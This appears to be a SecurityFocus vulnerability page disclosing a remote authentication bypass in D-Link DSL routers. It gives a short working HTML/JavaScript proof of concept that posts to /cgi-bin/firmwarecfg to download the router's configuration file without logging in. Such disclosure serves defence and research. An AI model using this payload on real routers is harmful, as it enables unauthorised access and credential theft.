Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

D-Link DSL Router Remote Authentication Bypass Vulnerability

An exploit is not required. The following HTML form example is sufficient to demonstrate this vulnerability:

<html><head>Download config.xml:<title>GetConfig - Config file
download</title></head><body>

<script lang="javascript">
function invia_richiesta()
{
document.DownloadConfig.action='http://'+document.InputBox.Host.value+'/cgi-bin/firmwarecfg';
document.DownloadConfig.submit();
}
</script>

<form name="InputBox">
<br>http://<input Name="Host" type="text" value="">/cgi-bin/firmwarecfg<br>
</form>
<form name="DownloadConfig" method="POST" action=""
enctype="multipart/form-data">
<input type="Submit" name="config" value="Download"
onClick="javascript:invia_richiesta();"><br>
</form></body></html>







 

Privacy Statement
Copyright 2009, SecurityFocus